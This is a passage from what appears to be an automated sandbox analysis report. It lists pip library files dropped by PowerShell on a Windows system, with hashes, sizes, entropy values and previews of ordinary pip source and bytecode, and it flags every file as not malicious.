                              SSDEEP:48:N68uaLawawkR5fTDUFH9t+ev1U4a4IfbMkQT7g4qJYQ0n:NMwbkBQFHH64gdQg4qYQ0n
                              MD5:628E1BEEA07576C543927AD86DAC31D2
                              SHA1:EC44BDD342B4F41696960DDEBEA06E717B345286
                              SHA-256:F2E5325F36FDE9508AEFDE0AD73D71C6E0745AC701BDD697BD749B4432348733
                              SHA-512:19456CFDBE00A341658074199DB37E4C61EAF50350B1F896FAB4007C24076818C933F80681E4600E68E13267D4EF4836487EF333240A3D6B18310921FF7E1C41
                              Malicious:false
                              Preview:........=.Cf...............................U.d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.i.Z.e.e.e.f.....e.d.<...d.e.d.d.f.d...Z.e.f.d.e.d.e.d.e.e.d.d.f.....f.d...Z.y.)......)...Dict..Generator)...CONTENT_CHUNK_SIZE..Response)...NetworkConnectionErrorz.Accept-Encoding..identity..HEADERS..resp..returnNc...........................d.}.t.........|.j...................t.................r...|.j...................j...................d.........}.n.|.j...................}.d.|.j...................c.x.k...r.d.k...r"n...n.|.j.....................d.|...d.|.j.......................}.n6d.|.j...................c.x.k...r.d.k...r!n...n.|.j.....................d.|...d.|.j.......................}.|.r.t.........|.|.............y.#.t.........$.r...|.j...................j...................d.........}.Y...w.x.Y.w.).N..z.utf-8z.iso-8859-1i....i....z. Client Error: z. for url: iX...z. Server Error: )...response)...isinstance..reason..bytes..decode..UnicodeDecodeError..status_code..urlr....).r......http_er
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):2958
                              Entropy (8bit):5.455372927349252
                              Encrypted:false
                              SSDEEP:48:GSB++JWLcdP++/1eqoZ4VE/BX30SljugoDRcJ5zX60687i6llPLmR:e+JWLcc+ds3jp3zX6z0L2
                              MD5:7CCB30F58B496D13994E52B8E54CD067
                              SHA1:147CB826B9094FB259678B88B5B8D416F4425623
                              SHA-256:881D63D24B2F250F5C976D5B1C992DF93C0EC285EB3B16B47455C87BA0CE5FEF
                              SHA-512:E5B055AC616740EC8C525B43BA6D4CB3F4B85D2FE0A165F397241FAA6EC475D6A96BC9600F0786676121ACBBFB0DFFD5E236B8384E87AEC5D18EDDE12340DDD9
                              Malicious:false
                              Preview:........=.Cf................................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.r.d.d.l.m.Z.m.Z...d.d.l.m.Z.....e.j&..................e.........Z...G.d...d.e.j,..................j...........................Z.y.).z#xmlrpclib.Transport implementation......N)...TYPE_CHECKING..Tuple)...NetworkConnectionError)...PipSession)...raise_for_status)..._HostType.._Marshallable)...SizedBufferc.....................^.......e.Z.d.Z.d.Z...d.d.e.d.e.d.e.d.d.f...f.d...Z...d.d.d.d.e.d.d.d.e.d.e.d.....f.d...Z...x.Z.S.)...PipXmlrpcTransportzRProvide a `xmlrpclib.Transport` implementation via a `PipSession`. object.. ..index_url..session..use_datetime..returnNc............................t...........|.....|...........t.........j...................j...................|.........}.|.j...................|._.........|.|._.........y.).N)...super..__init__..urllib..parse..urlparse..scheme.._scheme.._session)...selfr....r....r......index_parts..__class__s....
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):20541
                              Entropy (8bit):4.419441847140077
                              Encrypted:false
                              SSDEEP:192:GaxaV08sO0OLp5haOVKX2D/k5EzOEJlRL+jqrsLRjcqsWIv3LfW7Mvi+gIQFuRnG:Gaxa1p7kSTRiOQLxlITLqNXkB64oig6O
                              MD5:1D3CF7B4C916B82AED3878328B7A9C00
                              SHA1:B3C8663B501DE3A9B1A17EB858C83621158A3BF3
                              SHA-256:4C2F8E716D8A5385BA475854E2A3E0417BD51F9E1A7400A9673EAC5AAF91F4D0
                              SHA-512:BC4BC794485A676FE44A19ECE5EFDDC8EA0F012BDEABB389BEBD0171EA9BA385CCDCD1CF5203833728D1BA2B96E24B07A825EFD020AD3321822EAECAF434DFFA
                              Malicious:false
                              Preview:"""Network Authentication Helpers..Contains interface (MultiDomainBasicAuth) and associated glue code for.providing credentials in the context of network requests..""".import logging.import os.import shutil.import subprocess.import sysconfig.import typing.import urllib.parse.from abc import ABC, abstractmethod.from functools import lru_cache.from os.path import commonprefix.from pathlib import Path.from typing import Any, Dict, List, NamedTuple, Optional, Tuple..from pip._vendor.requests.auth import AuthBase, HTTPBasicAuth.from pip._vendor.requests.models import Request, Response.from pip._vendor.requests.utils import get_netrc_auth..from pip._internal.utils.logging import getLogger.from pip._internal.utils.misc import (. ask,. ask_input,. ask_password,. remove_auth_from_url,. split_auth_netloc_from_url,.).from pip._internal.vcs.versioncontrol import AuthInfo..logger = getLogger(__name__)..KEYRING_DISABLED = False...class Credentials(NamedTuple):. url: str. usernam
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):3935
                              Entropy (8bit):4.5367459930518805
                              Encrypted:false
                              SSDEEP:96:eatn8+Vt8CLtSKYrAdjB98ic5XENd02jagd02t/:VtjHpplcyPjaqPt/
                              MD5:BD5623B783BCC7693C921082172F561C
                              SHA1:2521F1CC06B3F0DC49CFAA39223E69BEA749BFA7
                              SHA-256:E3C03DEF5A82CCA345BE46F9EEE18493BFB4C5AA8F4B41D68F6EF5D50353C645
                              SHA-512:531BCD976F686F08C297C847D824FF2AC07AB2EB4FE4FC681D48203843A887CC31DEF5DA0BD674639A84E2DE545EAEA393AFCCE022171558A405493198024B9C
                              Malicious:false
                              Preview:"""HTTP cache implementation.."""..import os.from contextlib import contextmanager.from datetime import datetime.from typing import BinaryIO, Generator, Optional, Union..from pip._vendor.cachecontrol.cache import SeparateBodyBaseCache.from pip._vendor.cachecontrol.caches import SeparateBodyFileCache.from pip._vendor.requests.models import Response..from pip._internal.utils.filesystem import adjacent_tmp_file, replace.from pip._internal.utils.misc import ensure_dir...def is_from_cache(response: Response) -> bool:. return getattr(response, "from_cache", False)...@contextmanager.def suppressed_cache_errors() -> Generator[None, None, None]:. """If we can't access the cache then we can just skip caching and process. requests as if caching wasn't enabled.. """. try:. yield. except OSError:. pass...class SafeFileCache(SeparateBodyBaseCache):. """. A file based cache which is safe to use even when the target directory may. not be accessible or writable.
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):6086
                              Entropy (8bit):4.535167015839178
                              Encrypted:false
                              SSDEEP:96:w7W+0c7gLaX0VXLCrMiZZb0r3FAlBEm+1swUGgsMtG+1sAXhxe1Nw:w7t7xA+rLZZbe+lqJ2x
                              MD5:33EE21DB91B4122F1E32ED1E8EA926E6
                              SHA1:69610A1F064A6FAC3514A158BB4B45A4EED5D672
                              SHA-256:8B44E7E79083E43ED7604158DD3C6261A09FD0E69A4D0E9249C3600AC49E575E
                              SHA-512:4F1835E1F37F586F38A6DC091FF63ACEA677B678A4B635922A7949830CC7E3B09CB6E87250A4F870D7DEF636C90CEEFF4463D6555F280FFE46B078B0C43BA2A4
                              Malicious:false
                              Preview:"""Download files with progress indicators..""".import email.message.import logging.import mimetypes.import os.from typing import Iterable, Optional, Tuple..from pip._vendor.requests.models import CONTENT_CHUNK_SIZE, Response..from pip._internal.cli.progress_bars import get_download_progress_renderer.from pip._internal.exceptions import NetworkConnectionError.from pip._internal.models.index import PyPI.from pip._internal.models.link import Link.from pip._internal.network.cache import is_from_cache.from pip._internal.network.session import PipSession.from pip._internal.network.utils import HEADERS, raise_for_status, response_chunks.from pip._internal.utils.misc import format_size, redact_auth_from_url, splitext..logger = logging.getLogger(__name__)...def _get_http_response_size(resp: Response) -> Optional[int]:. try:. return int(resp.headers["content-length"]). except (ValueError, KeyError, TypeError):. return None...def _prepare_download(. resp: Response,. lin
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):7638
                              Entropy (8bit):4.533018537440655
                              Encrypted:false
                              SSDEEP:96:lmeq3Fhp8FzQpt6uga8eTs/ChNn0dutBcBU88DDrUdWPpi0PB/Ql:PyKFK6u0qs/s0IoUnzUdWPPxY
                              MD5:4C80D4FD2859B4B10C585AACC0F95FCA
                              SHA1:90F90B661EFB4AE55C9C0E5174C5F3F36128F344
                              SHA-256:D8F5D576E6193C23D99244057B527519B7C725678253EF855E89C6C887F0F5E5
                              SHA-512:AB278D291E57C3D8DA0AD3DD055A61C78D0512FECCEB3D89D12512EF5295CAEF23D0BD07E4D67EE8158B1D7A100FD9793745A327E059C82C950C5E69539954FA
                              Malicious:false
                              Preview:"""Lazy ZIP over HTTP"""..__all__ = ["HTTPRangeRequestUnsupported", "dist_from_wheel_url"]..from bisect import bisect_left, bisect_right.from contextlib import contextmanager.from tempfile import NamedTemporaryFile.from typing import Any, Dict, Generator, List, Optional, Tuple.from zipfile import BadZipFile, ZipFile..from pip._vendor.packaging.utils import canonicalize_name.from pip._vendor.requests.models import CONTENT_CHUNK_SIZE, Response..from pip._internal.metadata import BaseDistribution, MemoryWheel, get_wheel_distribution.from pip._internal.network.session import PipSession.from pip._internal.network.utils import HEADERS, raise_for_status, response_chunks...class HTTPRangeRequestUnsupported(Exception):. pass...def dist_from_wheel_url(name: str, url: str, session: PipSession) -> BaseDistribution:. """Return a distribution object from the given wheel URL... This uses HTTP range requests to only fetch the portion of the wheel. containing metadata, just enough for the o
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):18698
                              Entropy (8bit):4.5751244682162
                              Encrypted:false
                              SSDEEP:384:yeSx8+6E6RtPmwaJDzMzK64lU61dg5cfJfWMhjP3Cn+N8Y9kMs3SZY45Y5yrGH3R:yrx5hqtPSLCqP0yG4OjH30e
                              MD5:ED400E3CC8FE5CF4936A8A63056F2652
                              SHA1:4AE82ECA21AF93318FBD8419A0BEF7C8350AC27B
                              SHA-256:F6DA840C3F0989568576994E117271368F5C8D17C167A4486B4C9043FA813623
                              SHA-512:5EA9E5BEE9E50A2E2A7C66135C313E1C6D295CC0532004B2CF4A97E041E7AE86B269F4F57C8AE6B349673E18FF22AC47B3DF0DE8B1FB8293CCF2BCB8301083EE
                              Malicious:false
                              Preview:"""PipSession and supporting code, containing all pip-specific.network request configuration and behavior.."""..import email.utils.import io.import ipaddress.import json.import logging.import mimetypes.import os.import platform.import shutil.import subprocess.import sys.import urllib.parse.import warnings.from typing import (. TYPE_CHECKING,. Any,. Dict,. Generator,. List,. Mapping,. Optional,. Sequence,. Tuple,. Union,.)..from pip._vendor import requests, urllib3.from pip._vendor.cachecontrol import CacheControlAdapter as _BaseCacheControlAdapter.from pip._vendor.requests.adapters import DEFAULT_POOLBLOCK, BaseAdapter.from pip._vendor.requests.adapters import HTTPAdapter as _BaseHTTPAdapter.from pip._vendor.requests.models import PreparedRequest, Response.from pip._vendor.requests.structures import CaseInsensitiveDict.from pip._vendor.urllib3.connectionpool import ConnectionPool.from pip._vendor.urllib3.exceptions import InsecureRequestWarning..from pip i
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):4073
                              Entropy (8bit):4.467621998619944
                              Encrypted:false
                              SSDEEP:96:AyJmdmk/IlIqS8Jz8ZFy2u/u2EPqg9d+Ha+IIIbgmoj0:AmmYkF8JIjyJm/Pqg9d+HauJ0
                              MD5:753632450165D0EFF8C4751A18D5CCE5
                              SHA1:A2F5A9510319D95ADE4777BF462996CD0456E6E7
                              SHA-256:E80E52AD42441141F16C6B5BB1CC14D8DA42CB3FB7CED883946587A51461B09F
                              SHA-512:8549E7FC56D2D224AFA391AA6C1C884FB5B665BE38D469E139B18837A622D7E4E99CB59A827F3BB770562AD59CD9E6FB71619D786B41759ED7D9E468BD45F43C
                              Malicious:false
                              Preview:from typing import Dict, Generator..from pip._vendor.requests.models import CONTENT_CHUNK_SIZE, Response..from pip._internal.exceptions import NetworkConnectionError..# The following comments and HTTP headers were originally added by.# Donald Stufft in git commit 22c562429a61bb77172039e480873fb239dd8c03..#.# We use Accept-Encoding: identity here because requests defaults to.# accepting compressed responses. This breaks in a variety of ways.# depending on how the server is configured..# - Some servers will notice that the file isn't a compressible file.# and will leave the file alone and with an empty Content-Encoding.# - Some servers will notice that the file is already compressed and.# will leave the file alone, adding a Content-Encoding: gzip header.# - Some servers won't notice anything at all and will take a file.# that's already been compressed and compress it again, and set.# the Content-Encoding: gzip header.# By setting this to request only the identity encoding we're h
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):1838
                              Entropy (8bit):4.43781542816708
                              Encrypted:false
                              SSDEEP:48:yb9H7vgk5JYfH6+/1GFPzdvsJTxW9KMOWP:ap35Jya+dSP2JVQOWP
                              MD5:48F03AE3E7D166533D1FE1C50465C95E
                              SHA1:1B9D05D0166567A0F7B6D0295E5450CE8627CB64
                              SHA-256:B00C7339A709F8DD4D5C63EF6A9F630B7CEE6164A79EFDC65ED811DBE13600F0
                              SHA-512:F6F196C93BF36CA05C3B7D66F922D3278C85014F601B6A147F582A696770F146C08FA989279054AF80ACAC63FBB8A106EF8F1D87F70F2CD4870899E153B15E61
                              Malicious:false
                              Preview:"""xmlrpclib.Transport implementation."""..import logging.import urllib.parse.import xmlrpc.client.from typing import TYPE_CHECKING, Tuple..from pip._internal.exceptions import NetworkConnectionError.from pip._internal.network.session import PipSession.from pip._internal.network.utils import raise_for_status..if TYPE_CHECKING:. from xmlrpc.client import _HostType, _Marshallable.. from _typeshed import SizedBuffer..logger = logging.getLogger(__name__)...class PipXmlrpcTransport(xmlrpc.client.Transport):. """Provide a `xmlrpclib.Transport` implementation via a `PipSession`. object.. """.. def __init__(. self, index_url: str, session: PipSession, use_datetime: bool = False. ) -> None:. super().__init__(use_datetime). index_parts = urllib.parse.urlparse(index_url). self._scheme = index_parts.scheme. self._session = session.. def request(. self,. host: "_HostType",. handler: str,. request_body: "SizedBuff
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):206
                              Entropy (8bit):4.766397496197321
                              Encrypted:false
                              SSDEEP:6:rH/cl/Vne75jDn23d6oAreKAqAIZ6Iaatgem/l:T0tVe7ZSImbsZjaatHmt
                              MD5:526956FC1644350BCB5C9C90A98C4C85
                              SHA1:5E2E6A75824E63A63B777BDBA8D9A2B0A95DB316
                              SHA-256:720ED5B219F285F12E4585D72B96B3AD9EC287A92D237EC8A5C023C6BC0E3517
                              SHA-512:5C7613913B697CCA4088958B5E79E7772E41ED300C7E1C477A9F6703AC7A5519212FAFB575A7D3EF2E8CA6C49D3AB45A2E8E908C3C141964B01320588BC88EDF
                              Malicious:false
                              Preview:........=.Cf................................y.).N..r..........mC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/operations/__init__.py..<module>r........s.........r....
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):7588
                              Entropy (8bit):5.620280868278457
                              Encrypted:false
                              SSDEEP:96:qt3UWTJ1hjY5AxTXr1ysXCvBpvscGpyvv01aiY0//xB8a0x6qAPSu0Zbh:qtEWF1hEE0pkcGpyvv0T7/n8aPqu0ZF
                              MD5:FF577669C4CD7AC751917E74D7C16A7F
                              SHA1:47B19E95831BEF6796424AEACB3251B190A60CBF
                              SHA-256:5F58ECA2D9D34FEFC50D1D9FB4A7148DD3267C081C26C494D7C95AE2A2574966
                              SHA-512:815A0F522892FFF25521E1E2A014487E994D2C725AE6BE25E942129B1461A89EF4F29B180EFACD517849487BBA68100B5B2BBC1CF4C4E5CA96FC69D618BC53BC
                              Malicious:false
                              Preview:........=.Cf................................d.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....e.j:..................e.........Z...G.d...d.e.........Z e.e.e f.....Z!e.e.e.f.....Z"e.e.e.e.f.....Z#e.e.e.e"....f.....Z$e.e.e.e#....f.....Z%e.e$e%f.....Z&e.e!e&f.....Z'd.e.e!e(f.....f.d...Z)..d.d.e!d.e.e.e*g.e(f.........d.e&f.d...Z+d.e.e.....d.e'f.d...Z,d.e.e.....d.e!d.e.e.....f.d...Z-d.e.e.....d.e!d.e.e.....f.d...Z.d.e!d.d.f.d...Z/y.).z'Validation of dependencies of packages......N)...Callable..Dict..List..NamedTuple..Optional..Set..Tuple)...Requirement)...LegacySpecifier)...NormalizedName..canonicalize_name)...LegacyVersion)..)make_distribution_for_install_requirement)...get_default_environment)...DistributionVersion)...InstallRequirement)...deprecatedc.....................(.....e.Z.d.Z.U.e.e.d.<...e.e.....e.d.<...y.)...PackageDetails..version..dependenciesN)...__name__..__module__
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):10126
                              Entropy (8bit):5.437263098088669
                              Encrypted:false
                              SSDEEP:192:cVFw9voYtQ3JHhpQ7EBNgtvWBUrHZKloatlhPpRQwKEKF:cVuFQJBpQ78CQBUrHVohPp5zKF
                              MD5:65914EFADBE6829E4E8C0B03C7005889
                              SHA1:DD85826DA43B3D731454811728FDAC4A2B724501
                              SHA-256:99C03CBD7ADE771E20911518DF5F9F3986FFAA058417318D22DA0C56A320FC69
                              SHA-512:75AA37D70AC2BA22B07DC117C651F475B9E7DB8594D764A9D19A9DB36EF536BA91B16C4F087FACB93B0F06EBAF373DA39D9B8B99A04D661C921DFCB9F1AD1F24
                              Malicious:false
                              Preview:........=.CfX&........................t.....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.....e.j:..................e.........Z...G.d...d.e.........Z ..............d.d.e.e.e!........d.e"d.e"d.e.e.e!........d.e"d.e"d.e.e!....d.e.e!d.d.f.....f.d...Z#d.e.d.e!f.d...Z$d.e.d.e f.d...Z%..G.d...d.........Z&y.)......N)...Container..Dict..Generator..Iterable..List..NamedTuple..Optional..Set)...canonicalize_name)...Version)...BadCommand..InstallationError)...BaseDistribution..get_environment)...install_req_from_editable..install_req_from_line)...COMMENT_RE)..%direct_url_as_pep440_direct_referencec.....................(.....e.Z.d.Z.U.e.e.d.<...e.e.....e.d.<...y.)..._EditableInfo..requirement..commentsN)...__name__..__module__..__qualname__..str..__annotations__r............kC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/operations/freeze.pyr....r..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):25756
                              Entropy (8bit):5.261770727259946
                              Encrypted:false
                              SSDEEP:384:tO2wKTo8LCImMUGJEeDjRvnPX/XK5wxK4jL7JTKRp6dLa+4sSL5WkUDuYCOY9a:XTo8OHcEURvPXfS7AL7JTKRws/piD4Oj
                              MD5:2F86594157128E3F1246AFEA90AE00AF
                              SHA1:F081016C30D6E201CAEC421CEBA688005EEE5CDE
                              SHA-256:6FBC93458235FBF6A3460F00A36256FA6C86D07C439E4CA56FAC96BE7AE0810E
                              SHA-512:C5B27C761773300787005300DA9DC6F429637D0E0A455B0CBDBE4AA8747000F4BD192F3E4048AA2907DAD19B82847CF9DAC0FFD827144FD98E75AEA006577020
                              Malicious:false
                              Preview:........=.Cf.m.............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l m!Z!..d.d.l"m#Z#..d.d.l$m%Z%m&Z&..d.d.l'm(Z(m)Z)..d.d.l*m+Z+..d.d.l,m-Z-..d.d.l.m/Z/..d.d.l0m1Z1..d.d.l2m3Z3m4Z4..d.d.l5m6Z6m7Z7..d.d.l8m9Z9..d.d.l:m;Z;m<Z<m=Z=m>Z>..d.d.l?m@Z@..d.d.lAmBZB..d.d.lCmDZD....e1eE........ZFd.e/d.e-d.e.d.eGd.eGd e.f.d!..ZHd"e!d#eId$eJd d.f.d%..ZK..G.d&..d'........ZL....d2d"e!d(e&d)e.eI....d*e.e6....d eLf.d+..ZM..d2d"e!d)e.eI....d*e.e6....d eLf.d,..ZN....d2d"e!d#eId(e&d$eJd)e.eI....d*e.e6....d e.eL....f.d-..ZO..d3d"e!d)eId*e.e6....d.eGd e.eI....f.d/..ZP..G.d0..d1........ZQy.)4z)Prepares a distribution for installation......N)...Path)...Dict..Iterable..List..Optional)...canonicalize_name)..)make_distribution_for_install_requirement)...InstalledDistribution)...DirectoryUrlHashUnsupported..HashMismatch..HashUnpinned..InstallationError..Meta
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):212
                              Entropy (8bit):4.795542259093818
                              Encrypted:false
                              SSDEEP:6:rH/cl/Vne/n23d6oAreKAqAIiW4R6Iaatgem/l:T0tVeOImbsiDjaatHmt
                              MD5:1D9169CB0E8C7D0AD28596B983AB2863
                              SHA1:9EFD065C7BADBA722C13D03E5A9FA148DC7CE782
                              SHA-256:72B9657AE3DD5473580767C72ED370FF0C0EC962373C8E3488C69D796B676809
                              SHA-512:2DA5A69AFD8E3C8F7018F401F82E2C324EACCFFA236982501BEE403F8C4E158185174B83CA67BB95B632A5FE04B1CB448C84B2E79672450FC9B628690810D093
                              Malicious:false
                              Preview:........=.Cf................................y.).N..r..........sC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/operations/build/__init__.py..<module>r........s.........r....
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):7832
                              Entropy (8bit):5.347126791084803
                              Encrypted:false
                              SSDEEP:96:4AXtOywqhfCKD9C25qXtjYMxasmMk68VjNO3G62FUkYQjVmhe/Y:4OOyhhf/D96OM8VjxFUImhl
                              MD5:FC42209A4E099962CB5BD9FB40360B41
                              SHA1:E553470DBC8351276C216114E7D6F18E942FD297
                              SHA-256:D98A05D6E0CDBC5793B113553F474D40AB25B1B3E97EFEAB5DA24944035A4E4F
                              SHA-512:50E560A949CCCA293FBF217B0444B2F61C8361D9545F7AC7DF2BA698870B3A7B6C4980D000DE63EE8ABE6A0FE9759C362E3FB47D5625EA8871B9BD7F02CFD9E8
                              Malicious:false
                              Preview:........=.Cf..........................&.....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....e.j&..................e.........Z.e.j,..................d.e.d.e.d.....f.d...........Z.e.j,..................d.e.d.....f.d...........Z...G.d...d.e.........Z...G.d...d.........Z.y.)......N)...TracebackType)...Dict..Generator..Optional..Set..Type..Union)...Link)...InstallRequirement)...TempDirectory..changes..return..NNNc................+.......K.....t.........j...................}.t.................}.i.}.|.j...........................D.]...\...}.}...|.|.....|.|.<...|.|.|.<.........d.......|.j...........................D.]$..\...}.}.|.|.u.r.|.|.=...t.........|.t.................s.J...|.|.|.<....&..y.#.t.........$.r...|.|.|.<...Y..Tw.x.Y.w.#.|.j...........................D.]$..\...}.}.|.|.u.r.|.|.=...t.........|.t.................s.J...|.|.|.<....&..w.x.Y.w...w...N)...os..environ..object..items..KeyError..isinstance..str).r......targ
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):1889
                              Entropy (8bit):5.654316903998134
                              Encrypted:false
                              SSDEEP:24:ECXBpNb0HZkeJvTlXI86J5ZJYZjpmlLCGi2C5b/PHeBR98/W3VaUz8zYbxDQ1tOl:ECXBXWk0LhIaZjpml+L2C58Q/Wfxa1tK
                              MD5:32A362FEC7CA4430DCF002D0B6582F99
                              SHA1:9A3533CABAC7A0728E7D35AD80FD2A2A5C14DE0E
                              SHA-256:4D55694731B043CBCD90D2A53FF007B8D457613D6FEBFAA7E2915EF3B98516D7
                              SHA-512:D9D8983BEC5FE5D361294B98B66BF9BF95BE064FFAD2EBDA27B11C0FECD6DA03506A93264FCF6BCC4B86F0292E8B825F86E0B1DEE1F715EE5D48B1412D401A81
                              Malicious:false
                              Preview:........=.Cf..........................h.....d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.e.d.e.d.e.d.e.f.d...Z.y.).z4Metadata generation logic for source distributions.......N)...BuildBackendHookCaller)...BuildEnvironment)...InstallationSubprocessError..MetadataGenerationFailed)...runner_with_spinner_message)...TempDirectory..build_env..backend..details..returnc.....................f.....t.........d.d...........}.|.j...................}.|.5...t.........d.........}.|.j...................|.........5.....|.j...................|.........}...d.d.d...........d.d.d...........t.........j...................j...................|...........S.#.t.........$.r.}.t.........|...........|...d.}.~.w.w.x.Y.w.#.1.s.w...Y......Ox.Y.w.#.1.s.w...Y......Sx.Y.w.).zlGenerate metadata using mechanisms described in PEP 517... Returns the generated metadata directory.. z.modern-metadataT)...kind..globally_managedz#Preparing metadata (pyproject.toml))...package_detailsN).r....
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):1923
                              Entropy (8bit):5.660358782698872
                              Encrypted:false
                              SSDEEP:48:2bCXBXWk0LhIaZjpmW+H62I5D/LQua1tw:26XP0VIaZjx+Ho5D8Q
                              MD5:10CD6097ED5F3BEB6E80F75103C82AB7
                              SHA1:2B84E67A397C4AFC72157BB7FEFC2ADA297F1E41
                              SHA-256:B592C57C49B9A97632EB846AB5294CD77E7F67CF0BC7A80248E33E67B9066456
                              SHA-512:AEC13990BA3F1478DC26FF127A924A4DFE6D6991313C07084C87D78A6229C93EB47EC8286B2FC5D5DE5DCF268AC9552547FCD09FCA15D4EB3156867B81C3F42D
                              Malicious:false
                              Preview:........=.Cf..........................h.....d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.e.d.e.d.e.d.e.f.d...Z.y.).z4Metadata generation logic for source distributions.......N)...BuildBackendHookCaller)...BuildEnvironment)...InstallationSubprocessError..MetadataGenerationFailed)...runner_with_spinner_message)...TempDirectory..build_env..backend..details..returnc.....................f.....t.........d.d...........}.|.j...................}.|.5...t.........d.........}.|.j...................|.........5.....|.j...................|.........}...d.d.d...........d.d.d...........t.........j...................j...................|...........S.#.t.........$.r.}.t.........|...........|...d.}.~.w.w.x.Y.w.#.1.s.w...Y......Ox.Y.w.#.1.s.w...Y......Sx.Y.w.).zlGenerate metadata using mechanisms described in PEP 660... Returns the generated metadata directory.. z.modern-metadataT)...kind..globally_managedz,Preparing editable metadata (pyproject.toml))...package_detail
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):3074
                              Entropy (8bit):5.682050044118197
                              Encrypted:false
                              SSDEEP:48:OhRGnLcy+K9YkJPL2P0nc5j5q1oFY+TpElN2CUyGv5JcgesigO3bHtq7:OwLcy+mJPL2tFY+TpgUPHcIsHu
                              MD5:23226B1A9DF8E1D0134F171F295D21CA
                              SHA1:1EC537337D5B29F02E49BFACE41E35AEBB088E0E
                              SHA-256:7380AA6AA5470E5B5A9D6D40DE3EA9E3865DBAF71FDD3C9A576696B1DBC55688
                              SHA-512:192A0D23BA8E759C662431B4A2BF98F4004D06B607ACC3A628F7E7F9A17E5481BCF64F97913E23B9F4E6FF60FF50E1B283803D3A338D94E5259C37F86A7CDD69
                              Malicious:false
                              Preview:........=.Cf...............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....e.j"..................e.........Z.d.e.d.e.f.d...Z.d.e.d.e.d.e.d.e.d.e.d.e.f.d...Z.y.).z;Metadata generation logic for legacy source distributions.......N)...BuildEnvironment)...open_spinner)...InstallationError..InstallationSubprocessError..MetadataGenerationFailed)...make_setuptools_egg_info_args)...call_subprocess)...TempDirectory..directory..returnc.....................*.....t.........j...................|.........D...c.g.c.]...}.|.j...................d.........s...|.......}.}.|.s.t.........d.|...............t.........|.........d.kD..r.t.........d.j...................|...................t.........j...................j...................|.|.d.............S.c...c.}.w.).z.Find an .egg-info subdirectory in `directory`.z..egg-infoz No .egg-info directory found in .....z-More than one .egg-info directory found in {}r....)...os..listdir..endswith
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):1693
                              Entropy (8bit):5.611738604971842
                              Encrypted:false
